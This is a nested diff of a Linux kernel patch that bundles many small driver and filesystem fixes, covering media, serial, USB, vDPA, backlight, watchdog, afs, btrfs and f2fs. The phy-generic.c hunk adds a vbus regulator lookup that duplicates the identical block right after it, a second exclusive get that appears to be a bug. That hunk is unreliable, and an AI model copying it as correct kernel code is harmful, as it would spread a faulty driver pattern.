+ 		dma_alloc_attrs(dev->dev, CEDRUS_H265_NEIGHBOR_INFO_BUF_SIZE,
+@@ -845,14 +836,24 @@ static int cedrus_h265_start(struct cedrus_ctx *ctx)
+ static void cedrus_h265_stop(struct cedrus_ctx *ctx)
+ {
+ 	struct cedrus_dev *dev = ctx->dev;
++	struct cedrus_buffer *buf;
++	struct vb2_queue *vq;
++	unsigned int i;
+ 
+-	if (ctx->codec.h265.mv_col_buf_size > 0) {
+-		dma_free_attrs(dev->dev, ctx->codec.h265.mv_col_buf_size,
+-			       ctx->codec.h265.mv_col_buf,
+-			       ctx->codec.h265.mv_col_buf_addr,
+-			       DMA_ATTR_NO_KERNEL_MAPPING);
++	vq = v4l2_m2m_get_vq(ctx->fh.m2m_ctx, V4L2_BUF_TYPE_VIDEO_CAPTURE);
++
++	for (i = 0; i < vq->num_buffers; i++) {
++		buf = vb2_to_cedrus_buffer(vb2_get_buffer(vq, i));
+ 
+-		ctx->codec.h265.mv_col_buf_size = 0;
++		if (buf->codec.h265.mv_col_buf_size > 0) {
++			dma_free_attrs(dev->dev,
++				       buf->codec.h265.mv_col_buf_size,
++				       buf->codec.h265.mv_col_buf,
++				       buf->codec.h265.mv_col_buf_dma,
++				       DMA_ATTR_NO_KERNEL_MAPPING);
++
++			buf->codec.h265.mv_col_buf_size = 0;
++		}
+ 	}
+ 
+ 	dma_free_attrs(dev->dev, CEDRUS_H265_NEIGHBOR_INFO_BUF_SIZE,
+diff --git a/drivers/tty/serial/8250/8250_exar.c b/drivers/tty/serial/8250/8250_exar.c
+index dca1abe363248..55451ff846520 100644
+--- a/drivers/tty/serial/8250/8250_exar.c
++++ b/drivers/tty/serial/8250/8250_exar.c
+@@ -714,6 +714,7 @@ static void exar_pci_remove(struct pci_dev *pcidev)
+ 	for (i = 0; i < priv->nr; i++)
+ 		serial8250_unregister_port(priv->line[i]);
+ 
++	/* Ensure that every init quirk is properly torn down */
+ 	if (priv->board->exit)
+ 		priv->board->exit(pcidev);
+ }
+@@ -728,10 +729,6 @@ static int __maybe_unused exar_suspend(struct device *dev)
+ 		if (priv->line[i] >= 0)
+ 			serial8250_suspend_port(priv->line[i]);
+ 
+-	/* Ensure that every init quirk is properly torn down */
+-	if (priv->board->exit)
+-		priv->board->exit(pcidev);
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/tty/serial/max310x.c b/drivers/tty/serial/max310x.c
+index 163a89f84c9c2..444f89eb2d4b7 100644
+--- a/drivers/tty/serial/max310x.c
++++ b/drivers/tty/serial/max310x.c
+@@ -1459,7 +1459,7 @@ static int max310x_probe(struct device *dev, const struct max310x_devtype *devty
+ 	if (!ret)
+ 		return 0;
+ 
+-	dev_err(dev, "Unable to reguest IRQ %i\n", irq);
++	dev_err(dev, "Unable to request IRQ %i\n", irq);
+ 
+ out_uart:
+ 	for (i = 0; i < devtype->nr; i++) {
+diff --git a/drivers/tty/serial/samsung_tty.c b/drivers/tty/serial/samsung_tty.c
+index aa2c51b84116f..589daed19e625 100644
+--- a/drivers/tty/serial/samsung_tty.c
++++ b/drivers/tty/serial/samsung_tty.c
+@@ -996,11 +996,10 @@ static unsigned int s3c24xx_serial_tx_empty(struct uart_port *port)
+ 		if ((ufstat & info->tx_fifomask) != 0 ||
+ 		    (ufstat & info->tx_fifofull))
+ 			return 0;
+-
+-		return 1;
++		return TIOCSER_TEMT;
+ 	}
+ 
+-	return s3c24xx_serial_txempty_nofifo(port);
++	return s3c24xx_serial_txempty_nofifo(port) ? TIOCSER_TEMT : 0;
+ }
+ 
+ /* no modem control lines */
+diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
+index 981d2bfcf9a5b..9e30ef2b6eb8c 100644
+--- a/drivers/tty/vt/vt.c
++++ b/drivers/tty/vt/vt.c
+@@ -2515,7 +2515,7 @@ static void do_con_trol(struct tty_struct *tty, struct vc_data *vc, int c)
+ 		}
+ 		return;
+ 	case EScsiignore:
+-		if (c >= 20 && c <= 0x3f)
++		if (c >= 0x20 && c <= 0x3f)
+ 			return;
+ 		vc->vc_state = ESnormal;
+ 		return;
+diff --git a/drivers/usb/gadget/udc/net2272.c b/drivers/usb/gadget/udc/net2272.c
+index 538c1b9a28835..c42d5aa99e81a 100644
+--- a/drivers/usb/gadget/udc/net2272.c
++++ b/drivers/usb/gadget/udc/net2272.c
+@@ -2650,7 +2650,7 @@ net2272_plat_probe(struct platform_device *pdev)
+ 		goto err_req;
+ 	}
+ 
+-	ret = net2272_probe_fin(dev, IRQF_TRIGGER_LOW);
++	ret = net2272_probe_fin(dev, irqflags);
+ 	if (ret)
+ 		goto err_io;
+ 
+diff --git a/drivers/usb/phy/phy-generic.c b/drivers/usb/phy/phy-generic.c
+index 3dc5c04e7cbf9..953df04b40d40 100644
+--- a/drivers/usb/phy/phy-generic.c
++++ b/drivers/usb/phy/phy-generic.c
+@@ -265,6 +265,13 @@ int usb_phy_gen_create_phy(struct device *dev, struct usb_phy_generic *nop)
+ 			return -EPROBE_DEFER;
+ 	}
+ 
++	nop->vbus_draw = devm_regulator_get_exclusive(dev, "vbus");
++	if (PTR_ERR(nop->vbus_draw) == -ENODEV)
++		nop->vbus_draw = NULL;
++	if (IS_ERR(nop->vbus_draw))
++		return dev_err_probe(dev, PTR_ERR(nop->vbus_draw),
++				     "could not get vbus regulator\n");
++
+ 	nop->vbus_draw = devm_regulator_get_exclusive(dev, "vbus");
+ 	if (PTR_ERR(nop->vbus_draw) == -ENODEV)
+ 		nop->vbus_draw = NULL;
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index 2b7e796c48897..74d295312466f 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -185,8 +185,6 @@ static void teardown_driver(struct mlx5_vdpa_net *ndev);
+ 
+ static bool mlx5_vdpa_debug;
+ 
+-#define MLX5_CVQ_MAX_ENT 16
+-
+ #define MLX5_LOG_VIO_FLAG(_feature)                                                                \
+ 	do {                                                                                       \
+ 		if (features & BIT_ULL(_feature))                                                  \
+@@ -1980,9 +1978,16 @@ static void mlx5_vdpa_set_vq_num(struct vdpa_device *vdev, u16 idx, u32 num)
+ 	struct mlx5_vdpa_net *ndev = to_mlx5_vdpa_ndev(mvdev);
+ 	struct mlx5_vdpa_virtqueue *mvq;
+ 
+-	if (!is_index_valid(mvdev, idx) || is_ctrl_vq_idx(mvdev, idx))
++	if (!is_index_valid(mvdev, idx))
+ 		return;
+ 
++	if (is_ctrl_vq_idx(mvdev, idx)) {
++		struct mlx5_control_vq *cvq = &mvdev->cvq;
++
++		cvq->vring.vring.num = num;
++		return;
++	}
++
+ 	mvq = &ndev->vqs[idx];
+ 	mvq->num_ent = num;
+ }
+@@ -2512,7 +2517,7 @@ static int setup_cvq_vring(struct mlx5_vdpa_dev *mvdev)
+ 		u16 idx = cvq->vring.last_avail_idx;
+ 
+ 		err = vringh_init_iotlb(&cvq->vring, mvdev->actual_features,
+-					MLX5_CVQ_MAX_ENT, false,
++					cvq->vring.vring.num, false,
+ 					(struct vring_desc *)(uintptr_t)cvq->desc_addr,
+ 					(struct vring_avail *)(uintptr_t)cvq->driver_addr,
+ 					(struct vring_used *)(uintptr_t)cvq->device_addr);
+diff --git a/drivers/vdpa/vdpa_sim/vdpa_sim.c b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+index 61bde476cf9c8..e7fc25bfdd237 100644
+--- a/drivers/vdpa/vdpa_sim/vdpa_sim.c
++++ b/drivers/vdpa/vdpa_sim/vdpa_sim.c
+@@ -120,7 +120,7 @@ static void vdpasim_do_reset(struct vdpasim *vdpasim)
+ 	for (i = 0; i < vdpasim->dev_attr.nas; i++)
+ 		vhost_iotlb_reset(&vdpasim->iommu[i]);
+ 
+-	vdpasim->running = true;
++	vdpasim->running = false;
+ 	spin_unlock(&vdpasim->iommu_lock);
+ 
+ 	vdpasim->features = 0;
+@@ -513,6 +513,7 @@ static void vdpasim_set_status(struct vdpa_device *vdpa, u8 status)
+ 
+ 	spin_lock(&vdpasim->lock);
+ 	vdpasim->status = status;
++	vdpasim->running = (status & VIRTIO_CONFIG_S_DRIVER_OK) != 0;
+ 	spin_unlock(&vdpasim->lock);
+ }
+ 
+diff --git a/drivers/video/backlight/da9052_bl.c b/drivers/video/backlight/da9052_bl.c
+index 882359dd288c0..aa00379392a0f 100644
+--- a/drivers/video/backlight/da9052_bl.c
++++ b/drivers/video/backlight/da9052_bl.c
+@@ -117,6 +117,7 @@ static int da9052_backlight_probe(struct platform_device *pdev)
+ 	wleds->led_reg = platform_get_device_id(pdev)->driver_data;
+ 	wleds->state = DA9052_WLEDS_OFF;
+ 
++	memset(&props, 0, sizeof(struct backlight_properties));
+ 	props.type = BACKLIGHT_RAW;
+ 	props.max_brightness = DA9052_MAX_BRIGHTNESS;
+ 
+diff --git a/drivers/video/backlight/lm3630a_bl.c b/drivers/video/backlight/lm3630a_bl.c
+index 475f35635bf67..0d43f6326750f 100644
+--- a/drivers/video/backlight/lm3630a_bl.c
++++ b/drivers/video/backlight/lm3630a_bl.c
+@@ -231,7 +231,7 @@ static int lm3630a_bank_a_get_brightness(struct backlight_device *bl)
+ 		if (rval < 0)
+ 			goto out_i2c_err;
+ 		brightness |= rval;
+-		goto out;
++		return brightness;
+ 	}
+ 
+ 	/* disable sleep */
+@@ -242,11 +242,8 @@ static int lm3630a_bank_a_get_brightness(struct backlight_device *bl)
+ 	rval = lm3630a_read(pchip, REG_BRT_A);
+ 	if (rval < 0)
+ 		goto out_i2c_err;
+-	brightness = rval;
++	return rval;
+ 
+-out:
+-	bl->props.brightness = brightness;
+-	return bl->props.brightness;
+ out_i2c_err:
+ 	dev_err(pchip->dev, "i2c failed to access register\n");
+ 	return 0;
+@@ -306,7 +303,7 @@ static int lm3630a_bank_b_get_brightness(struct backlight_device *bl)
+ 		if (rval < 0)
+ 			goto out_i2c_err;
+ 		brightness |= rval;
+-		goto out;
++		return brightness;
+ 	}
+ 
+ 	/* disable sleep */
+@@ -317,11 +314,8 @@ static int lm3630a_bank_b_get_brightness(struct backlight_device *bl)
+ 	rval = lm3630a_read(pchip, REG_BRT_B);
+ 	if (rval < 0)
+ 		goto out_i2c_err;
+-	brightness = rval;
++	return rval;
+ 
+-out:
+-	bl->props.brightness = brightness;
+-	return bl->props.brightness;
+ out_i2c_err:
+ 	dev_err(pchip->dev, "i2c failed to access register\n");
+ 	return 0;
+@@ -339,6 +333,7 @@ static int lm3630a_backlight_register(struct lm3630a_chip *pchip)
+ 	struct backlight_properties props;
+ 	const char *label;
+ 
++	memset(&props, 0, sizeof(struct backlight_properties));
+ 	props.type = BACKLIGHT_RAW;
+ 	if (pdata->leda_ctrl != LM3630A_LEDA_DISABLE) {
+ 		props.brightness = pdata->leda_init_brt;
+diff --git a/drivers/video/backlight/lm3639_bl.c b/drivers/video/backlight/lm3639_bl.c
+index 6580911671a3e..4c9726a7fa720 100644
+--- a/drivers/video/backlight/lm3639_bl.c
++++ b/drivers/video/backlight/lm3639_bl.c
+@@ -339,6 +339,7 @@ static int lm3639_probe(struct i2c_client *client,
+ 	}
+ 
+ 	/* backlight */
++	memset(&props, 0, sizeof(struct backlight_properties));
+ 	props.type = BACKLIGHT_RAW;
+ 	props.brightness = pdata->init_brt_led;
+ 	props.max_brightness = pdata->max_brt_led;
+diff --git a/drivers/video/backlight/lp8788_bl.c b/drivers/video/backlight/lp8788_bl.c
+index ba42f3fe0c739..d9b95dbd40d30 100644
+--- a/drivers/video/backlight/lp8788_bl.c
++++ b/drivers/video/backlight/lp8788_bl.c
+@@ -191,6 +191,7 @@ static int lp8788_backlight_register(struct lp8788_bl *bl)
+ 	int init_brt;
+ 	char *name;
+ 
++	memset(&props, 0, sizeof(struct backlight_properties));
+ 	props.type = BACKLIGHT_PLATFORM;
+ 	props.max_brightness = MAX_BRIGHTNESS;
+ 
+diff --git a/drivers/watchdog/stm32_iwdg.c b/drivers/watchdog/stm32_iwdg.c
+index 570a71509d2a9..78d51deab87aa 100644
+--- a/drivers/watchdog/stm32_iwdg.c
++++ b/drivers/watchdog/stm32_iwdg.c
+@@ -21,6 +21,8 @@
+ #include <linux/platform_device.h>
+ #include <linux/watchdog.h>
+ 
++#define DEFAULT_TIMEOUT 10
++
+ /* IWDG registers */
+ #define IWDG_KR		0x00 /* Key register */
+ #define IWDG_PR		0x04 /* Prescaler Register */
+@@ -249,6 +251,7 @@ static int stm32_iwdg_probe(struct platform_device *pdev)
+ 	wdd->parent = dev;
+ 	wdd->info = &stm32_iwdg_info;
+ 	wdd->ops = &stm32_iwdg_ops;
++	wdd->timeout = DEFAULT_TIMEOUT;
+ 	wdd->min_timeout = DIV_ROUND_UP((RLR_MIN + 1) * PR_MIN, wdt->rate);
+ 	wdd->max_hw_heartbeat_ms = ((RLR_MAX + 1) * wdt->data->max_prescaler *
+ 				    1000) / wdt->rate;
+diff --git a/fs/afs/dir.c b/fs/afs/dir.c
+index 6e2c967fae6fc..07dc4ec73520c 100644
+--- a/fs/afs/dir.c
++++ b/fs/afs/dir.c
+@@ -473,16 +473,6 @@ static int afs_dir_iterate_block(struct afs_vnode *dvnode,
+ 			continue;
+ 		}
+ 
+-		/* Don't expose silly rename entries to userspace. */
+-		if (nlen > 6 &&
+-		    dire->u.name[0] == '.' &&
+-		    ctx->actor != afs_lookup_filldir &&
+-		    ctx->actor != afs_lookup_one_filldir &&
+-		    memcmp(dire->u.name, ".__afs", 6) == 0) {
+-			ctx->pos = blkoff + next * sizeof(union afs_xdr_dirent);
+-			continue;
+-		}
+-
+ 		/* found the next entry */
+ 		if (!dir_emit(ctx, dire->u.name, nlen,
+ 			      ntohl(dire->u.vnode),
+diff --git a/fs/btrfs/block-rsv.c b/fs/btrfs/block-rsv.c
+index 507b44d18572d..4cbf386166209 100644
+--- a/fs/btrfs/block-rsv.c
++++ b/fs/btrfs/block-rsv.c
+@@ -512,7 +512,7 @@ struct btrfs_block_rsv *btrfs_use_block_rsv(struct btrfs_trans_handle *trans,
+ 
+ 	block_rsv = get_block_rsv(trans, root);
+ 
+-	if (unlikely(block_rsv->size == 0))
++	if (unlikely(btrfs_block_rsv_size(block_rsv) == 0))
+ 		goto try_reserve;
+ again:
+ 	ret = btrfs_block_rsv_use_bytes(block_rsv, blocksize);
+diff --git a/fs/btrfs/block-rsv.h b/fs/btrfs/block-rsv.h
+index 578c3497a455c..df87c4949d065 100644
+--- a/fs/btrfs/block-rsv.h
++++ b/fs/btrfs/block-rsv.h
+@@ -101,4 +101,36 @@ static inline bool btrfs_block_rsv_full(const struct btrfs_block_rsv *rsv)
+ 	return data_race(rsv->full);
+ }
+ 
++/*
++ * Get the reserved amount of a block reserve in a context where getting a
++ * stale value is acceptable, instead of accessing it directly and triggering
++ * a data race warning from KCSAN.
++ */
++static inline u64 btrfs_block_rsv_reserved(struct btrfs_block_rsv *rsv)
++{
++	u64 ret;
++
++	spin_lock(&rsv->lock);
++	ret = rsv->reserved;
++	spin_unlock(&rsv->lock);
++
++	return ret;
++}
++
++/*
++ * Get the size of a block reserve in a context where getting a stale value is
++ * acceptable, instead of accessing it directly and triggering a data race
++ * warning from KCSAN.
++ */
++static inline u64 btrfs_block_rsv_size(struct btrfs_block_rsv *rsv)
++{
++	u64 ret;
++
++	spin_lock(&rsv->lock);
++	ret = rsv->size;
++	spin_unlock(&rsv->lock);
++
++	return ret;
++}
++
+ #endif /* BTRFS_BLOCK_RSV_H */
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index 2635fb4bffa06..8b75f436a9a3c 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -847,7 +847,7 @@ btrfs_calc_reclaim_metadata_size(struct btrfs_fs_info *fs_info,
+ static bool need_preemptive_reclaim(struct btrfs_fs_info *fs_info,
+ 				    struct btrfs_space_info *space_info)
+ {
+-	u64 global_rsv_size = fs_info->global_block_rsv.reserved;
++	const u64 global_rsv_size = btrfs_block_rsv_reserved(&fs_info->global_block_rsv);
+ 	u64 ordered, delalloc;
+ 	u64 total = writable_total_bytes(fs_info, space_info);
+ 	u64 thresh;
+@@ -948,8 +948,8 @@ static bool need_preemptive_reclaim(struct btrfs_fs_info *fs_info,
+ 	ordered = percpu_counter_read_positive(&fs_info->ordered_bytes) >> 1;
+ 	delalloc = percpu_counter_read_positive(&fs_info->delalloc_bytes);
+ 	if (ordered >= delalloc)
+-		used += fs_info->delayed_refs_rsv.reserved +
+-			fs_info->delayed_block_rsv.reserved;
++		used += btrfs_block_rsv_reserved(&fs_info->delayed_refs_rsv) +
++			btrfs_block_rsv_reserved(&fs_info->delayed_block_rsv);
+ 	else
+ 		used += space_info->bytes_may_use - global_rsv_size;
+ 
+@@ -1164,7 +1164,7 @@ static void btrfs_preempt_reclaim_metadata_space(struct work_struct *work)
+ 		enum btrfs_flush_state flush;
+ 		u64 delalloc_size = 0;
+ 		u64 to_reclaim, block_rsv_size;
+-		u64 global_rsv_size = global_rsv->reserved;
++		const u64 global_rsv_size = btrfs_block_rsv_reserved(global_rsv);
+ 
+ 		loops++;
+ 
+@@ -1176,9 +1176,9 @@ static void btrfs_preempt_reclaim_metadata_space(struct work_struct *work)
+ 		 * assume it's tied up in delalloc reservations.
+ 		 */
+ 		block_rsv_size = global_rsv_size +
+-			delayed_block_rsv->reserved +
+-			delayed_refs_rsv->reserved +
+-			trans_rsv->reserved;
++			btrfs_block_rsv_reserved(delayed_block_rsv) +
++			btrfs_block_rsv_reserved(delayed_refs_rsv) +
++			btrfs_block_rsv_reserved(trans_rsv);
+ 		if (block_rsv_size < space_info->bytes_may_use)
+ 			delalloc_size = space_info->bytes_may_use - block_rsv_size;
+ 
+@@ -1198,16 +1198,16 @@ static void btrfs_preempt_reclaim_metadata_space(struct work_struct *work)
+ 			to_reclaim = delalloc_size;
+ 			flush = FLUSH_DELALLOC;
+ 		} else if (space_info->bytes_pinned >
+-			   (delayed_block_rsv->reserved +
+-			    delayed_refs_rsv->reserved)) {
++			   (btrfs_block_rsv_reserved(delayed_block_rsv) +
++			    btrfs_block_rsv_reserved(delayed_refs_rsv))) {
+ 			to_reclaim = space_info->bytes_pinned;
+ 			flush = COMMIT_TRANS;
+-		} else if (delayed_block_rsv->reserved >
+-			   delayed_refs_rsv->reserved) {
+-			to_reclaim = delayed_block_rsv->reserved;
++		} else if (btrfs_block_rsv_reserved(delayed_block_rsv) >
++			   btrfs_block_rsv_reserved(delayed_refs_rsv)) {
++			to_reclaim = btrfs_block_rsv_reserved(delayed_block_rsv);
+ 			flush = FLUSH_DELAYED_ITEMS_NR;
+ 		} else {
+-			to_reclaim = delayed_refs_rsv->reserved;
++			to_reclaim = btrfs_block_rsv_reserved(delayed_refs_rsv);
+ 			flush = FLUSH_DELAYED_REFS_NR;
+ 		}
+ 
+diff --git a/fs/f2fs/checkpoint.c b/fs/f2fs/checkpoint.c
+index eb4d69f53337f..3ec203bbd5593 100644
+--- a/fs/f2fs/checkpoint.c
++++ b/fs/f2fs/checkpoint.c
+@@ -70,7 +70,7 @@ static struct page *__get_meta_page(struct f2fs_sb_info *sbi, pgoff_t index,
+ 		.old_blkaddr = index,
+ 		.new_blkaddr = index,
+ 		.encrypted_page = NULL,
+-		.is_por = !is_meta,
++		.is_por = !is_meta ? 1 : 0,
+ 	};
+ 	int err;
+ 
+@@ -234,8 +234,8 @@ int f2fs_ra_meta_pages(struct f2fs_sb_info *sbi, block_t start, int nrpages,
+ 		.op = REQ_OP_READ,
+ 		.op_flags = sync ? (REQ_META | REQ_PRIO) : REQ_RAHEAD,
+ 		.encrypted_page = NULL,
+-		.in_list = false,
+-		.is_por = (type == META_POR),
++		.in_list = 0,
++		.is_por = (type == META_POR) ? 1 : 0,
+ 	};
+ 	struct blk_plug plug;
+ 	int err;
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 967262c37da52..df6dfd7de6d0d 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -1249,10 +1249,11 @@ static int f2fs_write_compressed_pages(struct compress_ctx *cc,
+ 		.page = NULL,
+ 		.encrypted_page = NULL,
+ 		.compressed_page = NULL,
+-		.submitted = false,
++		.submitted = 0,
+ 		.io_type = io_type,
+ 		.io_wbc = wbc,
+-		.encrypted = fscrypt_inode_uses_fs_layer_crypto(cc->inode),
++		.encrypted = fscrypt_inode_uses_fs_layer_crypto(cc->inode) ?
++									1 : 0,
+ 	};
+ 	struct dnode_of_data dn;
+ 	struct node_info ni;
+@@ -1387,8 +1388,6 @@ static int f2fs_write_compressed_pages(struct compress_ctx *cc,
+ 	add_compr_block_stat(inode, cc->valid_nr_cpages);
+ 
+ 	set_inode_flag(cc->inode, FI_APPEND_WRITE);
+-	if (cc->cluster_idx == 0)
+-		set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
+ 
+ 	f2fs_put_dnode(&dn);
+ 	if (quota_inode)
+@@ -1436,6 +1435,8 @@ void f2fs_compress_write_end_io(struct bio *bio, struct page *page)
+ 	struct f2fs_sb_info *sbi = bio->bi_private;
+ 	struct compress_io_ctx *cic =
+ 			(struct compress_io_ctx *)page_private(page);
++	enum count_type type = WB_DATA_TYPE(page,
++				f2fs_is_compressed_page(page));
+ 	int i;
+ 
+ 	if (unlikely(bio->bi_status))
+@@ -1443,7 +1444,7 @@ void f2fs_compress_write_end_io(struct bio *bio, struct page *page)
+ 
+ 	f2fs_compress_free_page(page);
+ 
+-	dec_page_count(sbi, F2FS_WB_DATA);
++	dec_page_count(sbi, type);
+ 
+ 	if (atomic_dec_return(&cic->pending_pages))
+ 		return;
+@@ -1459,12 +1460,14 @@ void f2fs_compress_write_end_io(struct bio *bio, struct page *page)
+ }
+ 
+ static int f2fs_write_raw_pages(struct compress_ctx *cc,
+-					int *submitted,
++					int *submitted_p,
+ 					struct writeback_control *wbc,
+ 					enum iostat_type io_type)
+ {
+ 	struct address_space *mapping = cc->inode->i_mapping;
+-	int _submitted, compr_blocks, ret, i;
++	struct f2fs_sb_info *sbi = F2FS_M_SB(mapping);
++	int submitted, compr_blocks, i;
++	int ret = 0;
+ 
+ 	compr_blocks = f2fs_compressed_blocks(cc);
+ 
+@@ -1479,6 +1482,10 @@ static int f2fs_write_raw_pages(struct compress_ctx *cc,
+ 	if (compr_blocks < 0)
+ 		return compr_blocks;
+ 
++	/* overwrite compressed cluster w/ normal cluster */
++	if (compr_blocks > 0)
++		f2fs_lock_op(sbi);
++
+ 	for (i = 0; i < cc->cluster_size; i++) {
+ 		if (!cc->rpages[i])
+ 			continue;
+@@ -1503,7 +1510,7 @@ static int f2fs_write_raw_pages(struct compress_ctx *cc,
+ 		if (!clear_page_dirty_for_io(cc->rpages[i]))
+ 			goto continue_unlock;
+ 
+-		ret = f2fs_write_single_data_page(cc->rpages[i], &_submitted,
++		ret = f2fs_write_single_data_page(cc->rpages[i], &submitted,
+ 						NULL, NULL, wbc, io_type,
+ 						compr_blocks, false);
+ 		if (ret) {
+@@ -1511,26 +1518,29 @@ static int f2fs_write_raw_pages(struct compress_ctx *cc,
+ 				unlock_page(cc->rpages[i]);
+ 				ret = 0;
+ 			} else if (ret == -EAGAIN) {
++				ret = 0;
+ 				/*
+ 				 * for quota file, just redirty left pages to
+ 				 * avoid deadlock caused by cluster update race
+ 				 * from foreground operation.
+ 				 */
+ 				if (IS_NOQUOTA(cc->inode))
+-					return 0;
+-				ret = 0;
++					goto out;
+ 				f2fs_io_schedule_timeout(DEFAULT_IO_TIMEOUT);
+ 				goto retry_write;
+ 			}
+-			return ret;
++			goto out;
+ 		}
+ 
+-		*submitted += _submitted;
++		*submitted_p += submitted;
+ 	}
+ 
+-	f2fs_balance_fs(F2FS_M_SB(mapping), true);
++out:
++	if (compr_blocks > 0)
++		f2fs_unlock_op(sbi);
+ 
+-	return 0;
++	f2fs_balance_fs(sbi, true);
++	return ret;
+ }
+ 
+ int f2fs_write_multi_pages(struct compress_ctx *cc,
+@@ -1833,16 +1843,18 @@ void f2fs_put_page_dic(struct page *page, bool in_task)
+  * check whether cluster blocks are contiguous, and add extent cache entry
+  * only if cluster blocks are logically and physically contiguous.
+  */
+-unsigned int f2fs_cluster_blocks_are_contiguous(struct dnode_of_data *dn)
++unsigned int f2fs_cluster_blocks_are_contiguous(struct dnode_of_data *dn,
++						unsigned int ofs_in_node)
+ {
+-	bool compressed = f2fs_data_blkaddr(dn) == COMPRESS_ADDR;
++	bool compressed = data_blkaddr(dn->inode, dn->node_page,
++					ofs_in_node) == COMPRESS_ADDR;
+ 	int i = compressed ? 1 : 0;
+ 	block_t first_blkaddr = data_blkaddr(dn->inode, dn->node_page,
+-						dn->ofs_in_node + i);
++							ofs_in_node + i);
+ 
+ 	for (i += 1; i < F2FS_I(dn->inode)->i_cluster_size; i++) {
+ 		block_t blkaddr = data_blkaddr(dn->inode, dn->node_page,
+-						dn->ofs_in_node + i);
++							ofs_in_node + i);
+ 
+ 		if (!__is_valid_data_blkaddr(blkaddr))
+ 			break;
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 8b561af379743..b83b8ac29f430 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -50,7 +50,7 @@ void f2fs_destroy_bioset(void)
+ 	bioset_exit(&f2fs_bioset);
+ }
+ 
+-static bool __is_cp_guaranteed(struct page *page)
++bool f2fs_is_cp_guaranteed(struct page *page)
+ {
+ 	struct address_space *mapping = page->mapping;
+ 	struct inode *inode;
+@@ -67,8 +67,6 @@ static bool __is_cp_guaranteed(struct page *page)
+ 			S_ISDIR(inode->i_mode))
+ 		return true;
+ 
+-	if (f2fs_is_compressed_page(page))
+-		return false;
+ 	if ((S_ISREG(inode->i_mode) && IS_NOQUOTA(inode)) ||
+ 			page_private_gcing(page))
+ 		return true;
+@@ -327,7 +325,7 @@ static void f2fs_write_end_io(struct bio *bio)
+ 
+ 	bio_for_each_segment_all(bvec, bio, iter_all) {
+ 		struct page *page = bvec->bv_page;
+-		enum count_type type = WB_DATA_TYPE(page);
++		enum count_type type = WB_DATA_TYPE(page, false);
+ 
+ 		if (page_private_dummy(page)) {
+ 			clear_page_private_dummy(page);
+@@ -733,7 +731,7 @@ int f2fs_submit_page_bio(struct f2fs_io_info *fio)
+ 		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	inc_page_count(fio->sbi, is_read_io(fio->op) ?
+-			__read_io_type(page) : WB_DATA_TYPE(fio->page));
++			__read_io_type(page) : WB_DATA_TYPE(fio->page, false));
+ 
+ 	__submit_bio(fio->sbi, bio, fio->type);
+ 	return 0;
+@@ -941,7 +939,7 @@ int f2fs_merge_page_bio(struct f2fs_io_info *fio)
+ 	if (fio->io_wbc)
+ 		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+-	inc_page_count(fio->sbi, WB_DATA_TYPE(page));
++	inc_page_count(fio->sbi, WB_DATA_TYPE(page, false));
+ 
+ 	*fio->last_block = fio->new_blkaddr;
+ 	*fio->bio = bio;
+@@ -955,6 +953,7 @@ void f2fs_submit_page_write(struct f2fs_io_info *fio)
+ 	enum page_type btype = PAGE_TYPE_OF_BIO(fio->type);
+ 	struct f2fs_bio_info *io = sbi->write_io[btype] + fio->temp;
+ 	struct page *bio_page;
++	enum count_type type;
+ 
+ 	f2fs_bug_on(sbi, is_read_io(fio->op));
+ 
+@@ -982,9 +981,10 @@ void f2fs_submit_page_write(struct f2fs_io_info *fio)
+ 		bio_page = fio->page;
+ 
+ 	/* set submitted = true as a return value */
+-	fio->submitted = true;
++	fio->submitted = 1;
+ 
+-	inc_page_count(sbi, WB_DATA_TYPE(bio_page));
++	type = WB_DATA_TYPE(bio_page, fio->compressed_page);
++	inc_page_count(sbi, type);
+ 
+ 	if (io->bio &&
+ 	    (!io_is_mergeable(sbi, io->bio, io, fio, io->last_block_in_bio,
+@@ -997,8 +997,9 @@ void f2fs_submit_page_write(struct f2fs_io_info *fio)
+ 		if (F2FS_IO_ALIGNED(sbi) &&
+ 				(fio->type == DATA || fio->type == NODE) &&
+ 				fio->new_blkaddr & F2FS_IO_SIZE_MASK(sbi)) {
+-			dec_page_count(sbi, WB_DATA_TYPE(bio_page));
+-			fio->retry = true;
++			dec_page_count(sbi, WB_DATA_TYPE(bio_page,
++						fio->compressed_page));
++			fio->retry = 1;
+ 			goto skip;
+ 		}
+ 		io->bio = __bio_alloc(fio, BIO_MAX_VECS);
+@@ -1102,18 +1103,12 @@ static int f2fs_submit_page_read(struct inode *inode, struct page *page,
+ 	return 0;
+ }
+ 
+-static void __set_data_blkaddr(struct dnode_of_data *dn)
++static void __set_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
+ {
+-	struct f2fs_node *rn = F2FS_NODE(dn->node_page);
+-	__le32 *addr_array;
+-	int base = 0;
+-
+-	if (IS_INODE(dn->node_page) && f2fs_has_extra_attr(dn->inode))
+-		base = get_extra_isize(dn->inode);
++	__le32 *addr = get_dnode_addr(dn->inode, dn->node_page);
+ 
+-	/* Get physical address of data block */
+-	addr_array = blkaddr_in_node(rn);
+-	addr_array[base + dn->ofs_in_node] = cpu_to_le32(dn->data_blkaddr);
++	dn->data_blkaddr = blkaddr;
++	addr[dn->ofs_in_node] = cpu_to_le32(dn->data_blkaddr);
+ }
+ 
+ /*
+@@ -1122,18 +1117,17 @@ static void __set_data_blkaddr(struct dnode_of_data *dn)
+  *  ->node_page
+  *    update block addresses in the node page
+  */
+-void f2fs_set_data_blkaddr(struct dnode_of_data *dn)
